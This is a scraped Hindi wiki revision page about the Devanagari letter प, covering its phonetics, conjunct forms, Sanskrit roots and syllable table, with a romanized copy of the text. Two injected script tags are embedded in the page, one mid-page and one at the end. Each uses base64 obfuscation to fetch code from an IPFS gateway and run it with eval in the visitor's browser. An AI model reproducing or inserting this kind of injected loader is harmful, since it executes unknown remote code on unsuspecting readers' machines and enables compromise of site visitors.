Difference between revisions of "प"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('right|150px '''प''' देवनागरी लिपि का तेत्तीसवाँ ...' के साथ नया पृष्ठ बनाया)
 
Line 1: Line 1:
[[चित्र:प.jpg|right|150px]]
+
{{सूचना बक्सा संक्षिप्त परिचय
'''प''' [[देवनागरी लिपि]] का तेत्तीसवाँ [[अक्षर]] है। यह एक [[व्यंजन (व्याकरण)|व्यंजन]] है।
+
|चित्र=प.jpg
 +
|चित्र का नाम=
 +
|विवरण='''प''' [[देवनागरी वर्णमाला]] का पवर्ग का पहला [[व्यंजन (व्याकरण)|व्यंजन]] है।
 +
|शीर्षक 1=भाषाविज्ञान की दृष्टि से
 +
|पाठ 1=यह द्वि-ओष्ठय (द्वयोष्ठ्य) स्पर्श, अघोष और अल्पप्राण है। इसका [[महाप्राण व्यंजन|महाप्राण]] रूप 'फ' है।
 +
|शीर्षक 2= व्याकरण
 +
|पाठ 2=[ [[संस्कृत]] (धातु) पत् + णिच / ड ] [[पुल्लिंग]]- वायु, पत्र, पत्ता, अंडा।
 +
|शीर्षक 3=विशेष
 +
|पाठ 3='प' अल्पप्राण व्यंजन है अत: 'प' का द्वित्व हो सकता है। प्+प को 'प्प' के रूप में लिखा जाता है। जैसे- गप्पी, ठप्प।
 +
|शीर्षक 4=
 +
|पाठ 4= 
 +
|शीर्षक 5=
 +
|पाठ 5= 
 +
|शीर्षक 6=
 +
|पाठ 6=
 +
|शीर्षक 7=
 +
|पाठ 7=
 +
|शीर्षक 8=
 +
|पाठ 8=
 +
|शीर्षक 9=
 +
|पाठ 9=
 +
|शीर्षक 10=
 +
|पाठ 10=
 +
|संबंधित लेख=[[फ]], [[ब]], [[भ]], [[म]]
 +
|अन्य जानकारी=व्यंजन-गुच्छ के रूप में 'प' जिन व्यंजनों से पहले आता है। उनमें वह प्राय: खड़ी रेखा छोड़कर मिलता है। जैसे- आप्त, प्लीहा परन्तु 'र' से पहले आने पर 'प्र' के रूप में लिखा जाता है। जैसे- प्रलय, प्राचार्य, प्रीति, प्रेम।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''प''' [[देवनागरी वर्णमाला]] का पवर्ग का पहला [[व्यंजन (व्याकरण)|व्यंजन]] है। भाषाविज्ञान की दृष्टि से यह द्वि-ओष्ठय (द्वयोष्ठ्य) स्पर्श, अघोष और अल्पप्राण है। इसका [[महाप्राण व्यंजन|महाप्राण]] रूप 'फ' है।
 +
;विशेष-
 +
* व्यंजन-गुच्छ के रूप में 'प' जिन व्यंजनों से पहले आता है। उनमें वह प्राय: खड़ी रेखा छोड़कर मिलता है। जैसे- आप्त, प्लीहा परन्तु 'र' से पहले आने पर 'प्र' के रूप में लिखा जाता है। जैसे- प्रलय, प्राचार्य, प्रीति, प्रेम।
 +
* व्यंजन-गुच्छों में, प से पहले आकर मिलने वाले व्यंजन प्राय: अपनी खड़ी रेखा को छोड़कर मिलते है‌ं और 'प' यथावत् रहता है। जैसे- उत्पन्न, सम्पत्ति परन्तु 'प' के पहले आने वाला 'र' मिलने पर संयुक्त रूप 'र्प' बनाता है। जैसे- समर्पण, सर्पिल, दर्पी।
 +
* 'प' अल्पप्राण व्यंजन है अत: 'प' का द्वित्व हो सकता है। प्+प को 'प्प' के रूप में लिखा जाता है। जैसे- गप्पी, ठप्प।
 +
* [ [[संस्कृत]] (धातु) पत् + णिच / ड ] [[पुल्लिंग]]- वायु, पत्र, पत्ता, अंडा।
 +
* संगीत में 'प' पंचम स्वर के संक्षिप्त रूप में मान्य है।
 +
* [ संस्कृत (धातु) पा + क ] [[विशेषण]]-  पीने वाला। जैसे- पादक (=पैरों से जल पीने वाला = वृक्ष); मद्यप, रक्षक, शासक या पालक। जैसे- गोप, नृप, क्षितिप।
 +
==प की बारहखड़ी==
 +
{| class="bharattable-green"
 +
|-
 +
| प
 +
| पा
 +
| पि
 +
| पी
 +
| पु
 +
| पू
 +
| पे
 +
| पै
 +
| पो
 +
| पौ
 +
| पं
 +
| पः
 +
|}
 
==प अक्षर वाले शब्द==
 
==प अक्षर वाले शब्द==
 
* [[पानी]]
 
* [[पानी]]

Revision as of 14:11, 7 January 2017

p
vivaran p devanagari varnamala ka pavarg ka pahala vyanjan hai.
bhashavijnan ki drishti se yah dvi-oshthay (dvayoshthy) sparsh, aghosh aur alpapran hai. isaka mahapran roop 'ph' hai.
vyakaran [ sanskrit (dhatu) path + nich / d ] pulliang- vayu, patr, patta, aanda.
vishesh 'p' alpapran vyanjan hai at: 'p' ka dvitv ho sakata hai. ph+p ko 'pp' ke roop mean likha jata hai. jaise- gappi, thapp.
sanbandhit lekh ph, b, bh, m
any janakari vyanjan-guchchh ke roop mean 'p' jin vyanjanoan se pahale ata hai. unamean vah pray: kh di rekha chho dakar milata hai. jaise- apt, pliha parantu 'r' se pahale ane par 'pr' ke roop mean likha jata hai. jaise- pralay, prachary, priti, prem.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

p devanagari varnamala ka pavarg ka pahala vyanjan hai. bhashavijnan ki drishti se yah dvi-oshthay (dvayoshthy) sparsh, aghosh aur alpapran hai. isaka mahapran roop 'ph' hai.

vishesh-
  • vyanjan-guchchh ke roop mean 'p' jin vyanjanoan se pahale ata hai. unamean vah pray: kh di rekha chho dakar milata hai. jaise- apt, pliha parantu 'r' se pahale ane par 'pr' ke roop mean likha jata hai. jaise- pralay, prachary, priti, prem.
  • vyanjan-guchchhoan mean, p se pahale akar milane vale vyanjan pray: apani kh di rekha ko chho dakar milate hai‌an aur 'p' yathavath rahata hai. jaise- utpann, sampatti parantu 'p' ke pahale ane vala 'r' milane par sanyukt roop 'rp' banata hai. jaise- samarpan, sarpil, darpi.
  • 'p' alpapran vyanjan hai at: 'p' ka dvitv ho sakata hai. ph+p ko 'pp' ke roop mean likha jata hai. jaise- gappi, thapp.
  • [ sanskrit (dhatu) path + nich / d ] pulliang- vayu, patr, patta, aanda.
  • sangit mean 'p' pancham svar ke sankshipt roop mean many hai.
  • [ sanskrit (dhatu) pa + k ] visheshan- pine vala. jaise- padak (=pairoan se jal pine vala = vriksh); madyap, rakshak, shasak ya palak. jaise- gop, nrip, kshitip.

p ki barahakh di

p pa pi pi pu poo pe pai po pau pan pah

p akshar vale shabd



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>